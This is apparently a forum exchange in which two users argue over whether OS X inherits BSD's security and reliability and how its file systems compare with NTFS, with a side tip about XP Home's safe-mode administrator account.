I apologize for not having more time, so I will just hit the couple of things that jumped off the page.
OS X benefits from its FreeBSD underpinnings
Ok, you really don't understand what you are saying, or are intentionally trying to mislead people.
OSX is NOT BSD. It is using a BSD Interface to the kernel. PERIOD.
OSX is Darwin - there really is a BIG difference, and Darwin DOES NOT inherent the security and reliability of other BSD kernel interfacing variants. This is also true that FreeBSD and OpenBSD don't inherent each other's reliability or strengths. I wish people would quit confusing this.
OS X uses a BSD-based filesystem and CDSA to do the same things.
A) No... and B) they are NOT doing the same thing. Not even remotely the same.
Using your myopic view of NTFS, I could say FAT was the same as NTFS then too, because I could use ZIP encryption/compression on FAT... Which is completely WRONG, and misleading...
There is NO FS for OSX that natively supports all the features that NTFS does 'inherently'. Sure you can add features on to other good file systems, but then it isn't just the file system you have reference anymore, but the add-on as well.
Prove me wrong, I would welcome seeing a new FS technology. Find a FS that natively supports journalling, encryption, compression, security, meta-data, and is extensible with entry point code execution.
Go look this stuff up, these forums are not Operating System Architecture 101...
PS. To get past the 'simple file sharing, and simple security' on XP Home, just boot into safe mode and log in as an administrator. You will then have the full sharing and secuirty interface tools that are available in XP Professional, that normal home users don't really need to be playing with by default, but they are still there.
Ok, you really don't understand what you are saying, or are intentionally trying to mislead people.
I'm sure lying is not on my otherwise long list of character flaws, and I'm confident that I can hold my own with you regarding OS X, based on this thread. So, in short, I think you're wrong again.
OSX is NOT BSD. It is using a BSD Interface to the kernel. PERIOD.
OSX is Darwin - there really is a BIG difference, and Darwin DOES NOT inherent the security and reliability of other BSD kernel interfacing variants. This is also true that FreeBSD and OpenBSD don't inherent each other's reliability or strengths. I wish people would quit confusing this.
Darwin evolved from FreeBSD, which is, in fact, BSD. The industry almost ubiquitously respects BSD, in all its variants, with regard to stability and security. I don't know why you brought up OpenBSD specifically, other than you assumed incorrectly that I'm unaware of that project's highlighted focus on security beyond that of other BSD strains.
Yes, Darwin is the interface to the MACH kernel. And?
I'm no file system expert and I have no interest in becoming one. I'm a network operator, not a server or workstation guru. I've developed for OS X, and I have taken an effort, with this discussion, to study a bit of NTFS. I still haven't found anything that moves it beyond the current default OS X file system with journalling. Honestly, you probably know better, and good for you.
I have a network to tend to, so you have a good weekend and keep those servers humming. PERIOD.